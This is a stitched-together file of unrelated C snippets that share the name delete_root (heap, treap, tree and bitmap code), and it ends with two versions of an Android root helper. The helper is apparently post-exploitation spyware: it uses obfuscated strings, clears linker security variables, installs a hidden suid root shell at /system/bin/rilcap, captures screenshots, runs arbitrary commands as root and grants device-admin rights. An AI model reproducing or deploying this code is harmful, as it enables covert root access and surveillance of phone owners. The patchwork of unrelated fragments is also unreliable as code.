void heapsort(int *heap, int *size){
int element = 0;
while((element = delete_root(heap, size)) != -1)
printf("%d ", element);
}
static g95_bbt *delete_root(g95_bbt *t) {
g95_bbt *temp;
if (t->left == NULL)
return t->right;
if (t->right == NULL)
return t->left;
if (t->left->priority > t->right->priority) {
temp = rotate_right(t);
temp->right = delete_root(t);
} else {
temp = rotate_left(t);
temp->left = delete_root(t);
}
return temp;
}
int main(void){
int iaHeap[SIZE] = {0}; //iaHeap[0] stores nothing
int iElement = 0, iSize = 1;
char cAnswer = '\0';
do{
printf("ש�ששששששששששששששששששששששששש�\n"
"שר Heap Program שר\n"
"שדשששששששששששששששששששששששששו\n");
printf("1.Insert an element\n"
"2.Delete root\n"
"3.Heapsort\n"
"\n0.Exit\n");
printf("Select:[_]\b\b");
scanf(" %c", &cAnswer);
fflush(stdin);
if(cAnswer == '0')
break;
switch(cAnswer){
case '1':
printf("Enter an integer desired: ");
scanf(" %d", &iElement);
fflush(stdin);
insert(iaHeap, &iSize, iElement);
break;
case '2':
iElement = delete_root(iaHeap, &iSize);
printf("The deleted element is: %d", iElement);
break;
case '3':
printf("Warning: heapsorting will empty the heap.\n");
heapsort(iaHeap, &iSize);
break;
default:
printf("Invalid choice.\n");
break;
}
getchar();
system("cls");
} while(cAnswer != '0');
}
static g95_bbt *delete_treap(g95_bbt *old, g95_bbt *t, int (*compare)()) {
int c;
if (t == NULL)
return NULL;
c = compare(old, t);
if (c == 0)
t = delete_root(t);
else if (c < 0)
t->left = delete_treap(old, t->left, compare);
else if (c > 0)
t->right = delete_treap(old, t->right, compare);
return t;
}
static gfc_bbt *
delete_treap (gfc_bbt *old, gfc_bbt *t, compare_fn compare)
{
int c;
if (t == NULL)
return NULL;
c = (*compare) (old, t);
if (c < 0)
t->left = delete_treap (old, t->left, compare);
if (c > 0)
t->right = delete_treap (old, t->right, compare);
if (c == 0)
t = delete_root (t);
return t;
}
HBITMAP make_root_bmp(const char *command)
{
struct rootinfo RI;
struct rootinfo *r = &RI;
HBITMAP bmp = NULL;
init_root(r);
if (parse_root(r, command) && (r->gradient | r->solid | r->mod) && 0 == r->bmp)
{
int width, height;
RECT rect;
HWND hwnd_desk;
HDC hdc_desk, buf;
HGDIOBJ B0;
width = VScreenWidth;
height = VScreenHeight;
rect.left = rect.top = 0, rect.right = width, rect.bottom = height;
hwnd_desk = GetDesktopWindow();
hdc_desk = GetDC(hwnd_desk);
buf = CreateCompatibleDC(hdc_desk);
bmp = CreateCompatibleBitmap(hdc_desk, width, height);
B0 = SelectObject(buf, bmp);
MakeGradientEx(buf, rect,
r->type, r->color1, r->color2, 0 != r->interlaced,
r->bevelstyle, r->bevelposition,
0, 0, 0, r->color_from, r->color_to
);
if (r->mod)
Modula (buf, width, height, r->modx, r->mody, r->modfg);
SelectObject(buf, B0);
DeleteDC(buf);
ReleaseDC(hwnd_desk, hdc_desk);
}
delete_root(r);
return bmp;
}
void delete_tree(tree** t, const void* key,
int (*compare_keys)(const void* key1, const void* key2)) {
/* key with key to delete */
tree** d = del_search(t, key, compare_keys);
if(d == NULL) /*not found*/
return;
tree* p = NULL; /*key to be physically deleted */
if((*d)->parent == NULL) /*d is the root */
p = delete_root(d); /*fiiled if root has at least 1 child*/
else { /* not root */
if(((*d)->left == NULL) || ((*d)->right == NULL)) /*0 or 1 children*/
repoint_child(d);
else /*2 children*/
p = (tree*)successor_descendant(*d);
}
/*move child up to replace parent and delete child*/
if(p != NULL)
update_node(d, p, compare_keys);
}
// questo file viene compilato come rdb e quando l'exploit funziona viene suiddato
// statuslog -c "/system/bin/cat /dev/graphics/fb0"
int main(int argc, char** argv) {
unsigned char fb[] = "\x3b\x23\x1a\xa3\x5f"; // "fb"
unsigned char fb0[] = "\xd3\x05\xc7\x04\xb9\xbe\xaf\x04\xbc\xa3\xb2\xad\xc5\xba\xb0\xa0\x04\xbf\xb3\xed"; // "/dev/graphics/fb0"
unsigned char vol[] = "\x4e\xde\x93\xc8\x21\xde"; // "vol"
unsigned char vold1[] = "\x0b\xda\xd5\x8d\xe4\x9b\x93"; // "vold"
unsigned char vold2[] = "\xcc\x74\xbc\x5a\x63\x60\x68"; // "vold"
unsigned char reb[] = "\x2c\x97\xb8\x62\x77\x72"; // "reb"
unsigned char blr[] = "\xf4\x61\x96\x96\x98\x86"; // "blr"
unsigned char blw[] = "\x50\x1e\x4d\x4e\x44\x5b"; // "blw"
unsigned char rt[] = "\x04\x16\x10\x9a\x90"; // "rt"
unsigned char system1[] = "\x63\xfa\x9e\xbc\xf0\xee\xf0\xeb\xfa\xf2"; // "/system"
unsigned char system2[] = "\xa2\xf5\x50\x77\x33\x25\x33\x3e\x49\x31"; // "/system"
unsigned char system3[] = "\xd9\x65\xbb\x3e\x6a\x60\x6a\x77\x44\x7c"; // "/system"
unsigned char system4[] = "\xca\xa3\x6e\x2b\xff\xf5\xff\xc2\xf1\xe9"; // "/system"
unsigned char mntsdcard[] = "\xa4\x98\x37\xbb\xf9\xfa\xf0\xbb\xf7\xc0\xc7\xc5\xf6\xc0"; // "/mnt/sdcard"
unsigned char sd[] = "\x2d\xcf\xe0\xe2\xd7"; // "sd"
unsigned char ru[] = "\x2c\xb1\x9f\xbe\xbb"; // "ru"
unsigned char air[] = "\x9b\xc5\x5d\x7a\x72\x6b"; // "air"
unsigned char qzx[] = "\x04\x52\x55\x95\x82\x9c"; // "qzx"
unsigned char fhc[] = "\x68\x87\xec\x12\x00\x15"; // "fhc"
unsigned char fho[] = "\xa0\x46\xe5\x4a\x48\x53"; // "fho"
unsigned char pzm[] = "\x2d\x7a\x54\xad\xab\xc0"; // "pzm"
unsigned char qzs[] = "\x17\xc1\xd5\xe6\xef\xe4"; // "qzs"
unsigned char binsh1[] = "\xdf\x14\xc5\x10\xd4\xae\xd4\xab\xda\xd2\x10\xc5\xde\xd1\x10\xd4\xdf"; // "/system/bin/sh"
unsigned char binsh2[] = "\x0b\xeb\xee\xe4\x88\xb6\x88\x81\xb2\xba\xe4\xbf\xa6\xbb\xe4\x88\xa5"; // "/system/bin/sh"
unsigned char sh[] = "\x6a\xe2\x8a\x19\x06"; // "sh"
unsigned char lid[] = "\xb2\xf9\x48\x2e\x2d\x36"; // "lid"
unsigned char rf[] = "\xf9\x6f\x94\x95\x61"; // "rf"
unsigned char fhs[] = "\xe5\xe3\x05\x85\x93\x9a"; // "fhs"
unsigned char ape[] = "\xaa\xb4\x1d\xcb\x3a\x37"; // "ape"
unsigned char srh[] = "\x05\xcb\xcd\x8a\x89\xf3"; // "srh"
unsigned char sql[] = "\xd6\xd7\x02\xab\xa9\x46"; // "sql"
int i;
unsigned char *da, *db;
if (argc < 2) {
LOG("Usage: ");
LOG("%s", argv[0]);
LOG(" <command>\n");
LOG("fb - try to capture a screen snapshot\n");
LOG("vol - kill VOLD twice\n");
LOG("reb - reboot the phone\n");
LOG("blr - mount /system in READ_ONLY\n");
LOG("blw - mount /system in READ_WRITE\n");
LOG("rt - install the root shell in /system/bin/rilcap\n");
LOG("ru - remove the root shell from /system/bin/rilcap\n");
LOG("rf <mntpoint> <file> - remove <file> from <mntpoint>");
LOG("sd - mount /sdcard\n");
LOG("air - check if the shell has root privileges\n");
LOG("qzx \"command\" - execute the given commandline\n");
LOG("fhc <src> <dest> - copy <src> to <dst>\n");
LOG("fhs <mntpoint> <src> <dest> - copy <src> to <dst> on mountpoint <mntpoint>\n");
LOG("fho <user> <group> <file> - chown <file> to <user>:<group>\n");
LOG("pzm <newmode> <file> - chmod <file> to <newmode>\n");
LOG("qzs - start a root shell\n");
LOG("lid <proc> <dest file> - return process id for <proc> write it to <dest file>\n");
LOG("ape <content> <dest file> - append text <content> to <dest files> if not yet present\n");
LOG("srh <content> <file> - search for <content> in <file>\n");
return 0;
}
// Sanitize all secure environment variables (from linker_environ.c in AOSP linker).
/* The same list than GLibc at this point */
unsigned char* unsec_vars[] = {
"\x6e\xe6\x82\xe9\xf5\xe1\xe0\xf8\xf1\xc2\xf3\xc6\xea", // "GCONV_PATH"
"\x16\x2a\x37\x51\x57\x46\x55\xa9\xa8\x50\x59\x56\xa3\x44", // "GETCONF_DIR"
"\x17\x35\x29\xa1\xb8\x4c\x4d\xbe\xa5\xa6\xbe\x4c\xb2\x4c", // "HOSTALIASES"
"\xcc\x82\x46\x80\x88\x97\x8d\x99\x88\x85\x98", // "LD_AUDIT"
"\x9b\xdf\x4c\x69\x61\x7c\x61\x62\x67\x72\x64", // "LD_DEBUG"
"\x35\x15\x2f\x9b\x93\x6a\x93\x90\x99\x60\x92\x6a\x9a\x60\x63\x6f\x60\x63", // "LD_DEBUG_OUTPUT"
"\x3c\x66\x55\xb0\xb8\xaf\xb8\xad\xbe\x85\xb1\xbd\x83\xaf\xb7\xb9\x85\xbb", // "LD_DYNAMIC_WEAK"
"\xec\xc2\x21\xa0\xa8\xb7\xa0\xa5\xb2\x42\xad\x42\xb5\xb7\xbc\xad\xb8\xa4", // "LD_LIBRARY_PATH"
"\xee\x95\x75\xa2\xaa\xd3\xa3\xc4\xa9\xab\xa9\xa0\xd3\xc6\xd1\xda\xae", // "LD_ORIGIN_PATH"
"\xed\x59\xbe\xa3\x5b\x52\x4f\x41\x58\xa3\xa2\x5c\x5b", // "LD_PRELOAD"
"\xdd\x1c\xcb\xb1\xa9\x82\xb5\xb7\xb2\xab\xac\xb1\xa8", // "LD_PROFILE"
"\x87\xca\x41\x5f\x47\x68\x54\x53\x58\x50\x68\x5a\x56\x63\x51\xa2", // "LD_SHOW_AUXV"
"\x60\x04\x74\x34\x2c\x47\x3d\x33\x2d\x47\x34\x37\x21\x2c\x47\x22\x29\x21\x33", // "LD_USE_LOAD_BIAS"
"\x8e\x25\xa0\xc2\xc3\xd7\xd1\xc2\xca\xc3\xcd\xd1\xc9\xc0", // "LOCALDOMAIN"
"\x94\xd5\x46\x78\x65\x79\x4c\x7f\x40\x64", // "LOCPATH"
"\xe0\xe5\x09\x77\x63\x74\x74\x71\x6d\x41\x7c\x72\x63\x6d\x6f\x3b", // "MALLOC_TRACE"
"\x02\x30\x3f\x4f\x43\x4e\x4e\x4d\x41\xbd\x41\x4a\x47\x41\x49\xbd", // "MALLOC_CHECK_"
"\xf9\x13\xe2\xd9\xd0\xae\xaa\xaf\xd8\xd3\xd7", // "NIS_PATH"
"\xf5\x05\xf7\xc5\xbb\xae\xaf\xbc\xa3\xc7", // "NLSPATH"
"\x28\xc5\xfd\xfa\xf7\x85\xe9\xec\x86\xf9\xe0\xe9\x85\x84\xf9\xf5\xe9\xee\xf6", // "RESOLV_HOST_CONF"
"\xde\x47\x92\x94\xa5\x93\x8f\x9f\x92\x96\x99\x9f\x90\x93", // "RES_OPTIONS"
"\x87\x04\x85\xd3\xca\xdf\xc3\xd6\xdd", // "TMPDIR"
"\xf1\x5e\xaa\x5d\x57\x4d\x48\x5f", // "TZDIR
"\x9c\x1e\x97\xf0\xe8\xff\xe5\xef\xf9\xf8\xff\xf0\xed\xe2\xf2\xe5\xf2\xfd\xff\xf4\xe5\xf8\xec\xc5", // "LD_AOUT_LIBRARY_PATH"
"\x20\x14\x3b\x94\x6c\x87\x61\x97\x9d\x9c\x87\x90\x92\x6d\x94\x97\x61\x6c", // "LD_AOUT_PRELOAD"
// not listed in linker, used due to system() call
"\xe4\xca\x2d\xbd\xa6\x4b", // "IFS",
};
int h = 0;
for(h=0; h<sizeof(unsec_vars)/sizeof(unsec_vars[0]); h++)
unsetenv(deobfuscate(unsec_vars[h]));
/*
* set LD_LIBRARY_PATH if the linker has wiped out it due to we're suid.
* This occurs on Android 4.0+
*/
setenv(deobfuscate(ld_library_path), deobfuscate(system_libs), 0);
setgod();
// Cattura uno screenshot
if (strcmp(argv[1], deobfuscate(fb)) == 0 && argc == 3) {
LOG("Capturing a screenshot\n");
char* filename = argv[2];
copy(deobfuscate(fb0), filename);
chmod(filename, 0666);
} else if (strcmp(argv[1], deobfuscate(vol)) == 0) { // Killa VOLD per due volte
unsigned int pid;
LOG("Killing VOLD\n");
for (i = 0; i < 2; i++) {
pid = getProcessId(deobfuscate(vold1));
if (pid) {
kill(getProcessId(deobfuscate(vold2)), SIGKILL);
sleep(2);
}
}
} else if (strcmp(argv[1], deobfuscate(reb)) == 0) { // Reboot
LOG("Rebooting...\n");
sync_reboot();
} else if (strcmp(argv[1], deobfuscate(blr)) == 0) { // Monta /system in READ_ONLY
LOG("Mounting FS read only\n");
remount(deobfuscate(system1), MS_RDONLY);
} else if (strcmp(argv[1], deobfuscate(blw)) == 0) { // Monta /system in READ_WRITE
LOG("Mounting FS read write\n");
remount(deobfuscate(system2), 0);
} else if (strcmp(argv[1], deobfuscate(rt)) == 0) { // Copia la shell root in /system/bin/rilcap
LOG("Installing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(ROOT_BIN));
copy_root(deobfuscate(system3), deobfuscate(ROOT_BIN));
delete_root(deobfuscate(system4), deobfuscate(old_name_shell));
} else if (strcmp(argv[1], deobfuscate(ru)) == 0) { // Cancella la shell root in /system/bin/rilcap
LOG("Removing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(ROOT_BIN));
} else if (strcmp(argv[1], deobfuscate(rf)) == 0) { // Cancella un file dal filesystem
LOG("Removing %s from %s\n", argv[3], argv[2]);
delete_root(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(sd)) == 0) { // Mount /sdcard
LOG("Mounting /sdcard\n");
my_mount(deobfuscate(mntsdcard));
} else if (strcmp(argv[1], deobfuscate(air)) == 0) { // Am I Root?
LOG("Are we root?\n");
return setgod();
} else if (strcmp(argv[1], deobfuscate(qzx)) == 0) { // Eseguiamo la riga passataci
LOG("Executing \"%s\"\n", argv[2]);
return system(argv[2]);
} else if (strcmp(argv[1], deobfuscate(fhc)) == 0) { // Copiamo un file nel path specificato dal secondo argomento
LOG("Copying file %s to %s\n", argv[2], argv[3]);
copy(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fhs)) == 0) { // Copiamo un file nel path specificato dal secondo argomento (con remount del mntpoint)
LOG("Copying file %s to %s on mountpoint %s\n", argv[3], argv[4], argv[2]);
copy_remount(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fho)) == 0) { // chown: user group file
LOG("Chowning to %s:%s file %s\n", argv[2], argv[3], argv[4]);
my_chown(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(pzm)) == 0) { // chmod: newmode file
LOG("Chmodding to %s file %s\n", argv[2], argv[3]);
my_chmod(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(lid)) == 0) { // Write pid of a process to file
LOG("Returning process ID for %s to %s\n", argv[2], argv[3]);
i = getProcessId(argv[2]);
LOG("Process id is: %d\n", i);
log_to_file(argv[3], (char *)&i, sizeof(int));
return 0;
} else if (strcmp(argv[1], deobfuscate(ape)) == 0) { // Append text content to file, add newline
LOG("Appending %s to %s\n", argv[2], argv[3]);
return append_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(srh)) == 0) { // Search for content in file return 1 if content is present 0 if not, -1 in case of error
LOG("Searching for %s in %s\n", argv[2], argv[3]);
return search_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(qzs)) == 0) { // Eseguiamo una root shell
const char * shell = deobfuscate(binsh1);
LOG("Starting root shell\n");
int i;
char *exec_args[argc + 1];
exec_args[argc] = NULL;
exec_args[0] = deobfuscate(sh);
for (i = 1; i < argc; i++) {
exec_args[i] = argv[i];
}
execv(deobfuscate(binsh2), exec_args);
LOG("Exiting shell\n");
} else if (strcmp(argv[1], deobfuscate(sql)) == 0) {
if(!argv[2]) return 0;
add_huawei_permission(argv[2]);
}
return 0;
}
// questo file viene compilato come rdb e quando l'exploit funziona viene suiddato
// statuslog -c "/system/bin/cat /dev/graphics/fb0"
int main(int argc, char** argv) {
unsigned char fb[] = "\x3b\x23\x1a\xa3\x5f"; // "fb"
unsigned char fb0[] = "\xd3\x05\xc7\x04\xb9\xbe\xaf\x04\xbc\xa3\xb2\xad\xc5\xba\xb0\xa0\x04\xbf\xb3\xed"; // "/dev/graphics/fb0"
unsigned char vol[] = "\x4e\xde\x93\xc8\x21\xde"; // "vol"
unsigned char vold1[] = "\x0b\xda\xd5\x8d\xe4\x9b\x93"; // "vold"
unsigned char vold2[] = "\xcc\x74\xbc\x5a\x63\x60\x68"; // "vold"
unsigned char reb[] = "\x2c\x97\xb8\x62\x77\x72"; // "reb"
unsigned char blr[] = "\xf4\x61\x96\x96\x98\x86"; // "blr"
unsigned char blw[] = "\x50\x1e\x4d\x4e\x44\x5b"; // "blw"
unsigned char rt[] = "\x04\x16\x10\x9a\x90"; // "rt"
unsigned char system1[] = "\x63\xfa\x9e\xbc\xf0\xee\xf0\xeb\xfa\xf2"; // "/system"
unsigned char system2[] = "\xa2\xf5\x50\x77\x33\x25\x33\x3e\x49\x31"; // "/system"
unsigned char system3[] = "\xd9\x65\xbb\x3e\x6a\x60\x6a\x77\x44\x7c"; // "/system"
unsigned char system4[] = "\xca\xa3\x6e\x2b\xff\xf5\xff\xc2\xf1\xe9"; // "/system"
unsigned char mntsdcard[] = "\xa4\x98\x37\xbb\xf9\xfa\xf0\xbb\xf7\xc0\xc7\xc5\xf6\xc0"; // "/mnt/sdcard"
unsigned char rilcap1[] = "\x35\x63\x44\x1e\xca\xcc\xca\xc7\xd0\xd8\x1e\xd9\xdc\xdd\x1e\xc9\xdc\xdf\xda\xd4\xcb"; // "/system/bin/rilcap"
unsigned char rilcap2[] = "\x78\xd1\xbb\xf9\x0d\x03\x0d\x0c\x3f\x37\xf9\x3a\x33\x36\xf9\x0a\x33\x34\x3d\x3b\x08"; // "/system/bin/rilcap"
unsigned char sd[] = "\x2d\xcf\xe0\xe2\xd7"; // "sd"
unsigned char ru[] = "\x2c\xb1\x9f\xbe\xbb"; // "ru"
unsigned char air[] = "\x9b\xc5\x5d\x7a\x72\x6b"; // "air"
unsigned char qzx[] = "\x04\x52\x55\x95\x82\x9c"; // "qzx"
unsigned char fhc[] = "\x68\x87\xec\x12\x00\x15"; // "fhc"
unsigned char fho[] = "\xa0\x46\xe5\x4a\x48\x53"; // "fho"
unsigned char pzm[] = "\x2d\x7a\x54\xad\xab\xc0"; // "pzm"
unsigned char qzs[] = "\x17\xc1\xd5\xe6\xef\xe4"; // "qzs"
unsigned char binsh1[] = "\xdf\x14\xc5\x10\xd4\xae\xd4\xab\xda\xd2\x10\xc5\xde\xd1\x10\xd4\xdf"; // "/system/bin/sh"
unsigned char binsh2[] = "\x0b\xeb\xee\xe4\x88\xb6\x88\x81\xb2\xba\xe4\xbf\xa6\xbb\xe4\x88\xa5"; // "/system/bin/sh"
unsigned char adm[] = "\x5b\x25\x7d\x7a\x41\x7e"; // "adm"
unsigned char sh[] = "\x6a\xe2\x8a\x19\x06"; // "sh"
unsigned char lid[] = "\xb2\xf9\x48\x2e\x2d\x36"; // "lid"
unsigned char rf[] = "\xf9\x6f\x94\x95\x61"; // "rf"
unsigned char fhs[] = "\xe5\xe3\x05\x85\x93\x9a"; // "fhs"
unsigned char ape[] = "\xaa\xb4\x1d\xcb\x3a\x37"; // "ape"
unsigned char srh[] = "\x05\xcb\xcd\x8a\x89\xf3"; // "srh"
int i;
unsigned char *da, *db;
if (argc < 2) {
LOG("Usage: ");
LOG("%s", argv[0]);
LOG(" <command>\n");
LOG("fb - try to capture a screen snapshot\n");
LOG("vol - kill VOLD twice\n");
LOG("reb - reboot the phone\n");
LOG("blr - mount /system in READ_ONLY\n");
LOG("blw - mount /system in READ_WRITE\n");
LOG("rt - install the root shell in /system/bin/rilcap\n");
LOG("ru - remove the root shell from /system/bin/rilcap\n");
LOG("rf <mntpoint> <file> - remove <file> from <mntpoint>");
LOG("sd - mount /sdcard\n");
LOG("air - check if the shell has root privileges\n");
LOG("qzx \"command\" - execute the given commandline\n");
LOG("fhc <src> <dest> - copy <src> to <dst>\n");
LOG("fhs <mntpoint> <src> <dest> - copy <src> to <dst> on mountpoint <mntpoint>\n");
LOG("fho <user> <group> <file> - chown <file> to <user>:<group>\n");
LOG("pzm <newmode> <file> - chmod <file> to <newmode>\n");
LOG("adm <package name/receiver>\n");
LOG("qzs - start a root shell\n");
LOG("lid <proc> <dest file> - return process id for <proc> write it to <dest file>\n");
LOG("ape <content> <dest file> - append text <content> to <dest files> if not yet present\n");
LOG("srh <content> <file> - search for <content> in <file>\n");
return 0;
}
setgod();
// Cattura uno screenshot
if (strcmp(argv[1], deobfuscate(fb)) == 0 && argc == 3) {
LOG("Capturing a screenshot\n");
char* filename = argv[2];
copy(deobfuscate(fb0), filename);
chmod(filename, 0666);
} else if (strcmp(argv[1], deobfuscate(vol)) == 0) { // Killa VOLD per due volte
unsigned int pid;
LOG("Killing VOLD\n");
for (i = 0; i < 2; i++) {
pid = getProcessId(deobfuscate(vold1));
if (pid) {
kill(getProcessId(deobfuscate(vold2)), SIGKILL);
sleep(2);
}
}
} else if (strcmp(argv[1], deobfuscate(reb)) == 0) { // Reboot
LOG("Rebooting...\n");
sync_reboot();
} else if (strcmp(argv[1], deobfuscate(blr)) == 0) { // Monta /system in READ_ONLY
LOG("Mounting FS read only\n");
remount(deobfuscate(system1), MS_RDONLY);
} else if (strcmp(argv[1], deobfuscate(blw)) == 0) { // Monta /system in READ_WRITE
LOG("Mounting FS read write\n");
remount(deobfuscate(system2), 0);
} else if (strcmp(argv[1], deobfuscate(rt)) == 0) { // Copia la shell root in /system/bin/rilcap
LOG("Installing suid shell\n");
copy_root(deobfuscate(system3), deobfuscate(rilcap1));
} else if (strcmp(argv[1], deobfuscate(ru)) == 0) { // Cancella la shell root in /system/bin/rilcap
LOG("Removing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(rilcap2));
} else if (strcmp(argv[1], deobfuscate(rf)) == 0) { // Cancella un file dal filesystem
LOG("Removing %s from %s\n", argv[3], argv[2]);
delete_root(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(sd)) == 0) { // Mount /sdcard
LOG("Mounting /sdcard\n");
my_mount(deobfuscate(mntsdcard));
} else if (strcmp(argv[1], deobfuscate(air)) == 0) { // Am I Root?
LOG("Are we root?\n");
return setgod();
} else if (strcmp(argv[1], deobfuscate(qzx)) == 0) { // Eseguiamo la riga passataci
LOG("Executing \"%s\"\n", argv[2]);
return system(argv[2]);
} else if (strcmp(argv[1], deobfuscate(fhc)) == 0) { // Copiamo un file nel path specificato dal secondo argomento
LOG("Copying file %s to %s\n", argv[2], argv[3]);
copy(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fhs)) == 0) { // Copiamo un file nel path specificato dal secondo argomento (con remount del mntpoint)
LOG("Copying file %s to %s on mountpoint %s\n", argv[3], argv[4], argv[2]);
copy_remount(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fho)) == 0) { // chown: user group file
LOG("Chowning to %s:%s file %s\n", argv[2], argv[3], argv[4]);
my_chown(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(pzm)) == 0) { // chmod: newmode file
LOG("Chmodding to %s file %s\n", argv[2], argv[3]);
my_chmod(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(adm)) == 0) { // Add the application to the admin list
LOG("Adding the app %s to Administrators list\n", argv[2]);
add_admin(argv[2]);
return 0;
} else if (strcmp(argv[1], deobfuscate(lid)) == 0) { // Write pid of a process to file
LOG("Returning process ID for %s to %s\n", argv[2], argv[3]);
i = getProcessId(argv[2]);
LOG("Process id is: %d\n", i);
log_to_file(argv[3], (char *)&i, sizeof(int));
return 0;
} else if (strcmp(argv[1], deobfuscate(ape)) == 0) { // Append text content to file, add newline
LOG("Appending %s to %s\n", argv[2], argv[3]);
return append_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(srh)) == 0) { // Search for content in file return 1 if content is present 0 if not, -1 in case of error
LOG("Searching for %s in %s\n", argv[2], argv[3]);
return search_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(qzs)) == 0) { // Eseguiamo una root shell
const char * shell = deobfuscate(binsh1);
LOG("Starting root shell\n");
int i;
char *exec_args[argc + 1];
exec_args[argc] = NULL;
exec_args[0] = deobfuscate(sh);
for (i = 1; i < argc; i++) {
exec_args[i] = argv[i];
}
execv(deobfuscate(binsh2), exec_args);
LOG("Exiting shell\n");
}
return 0;
}
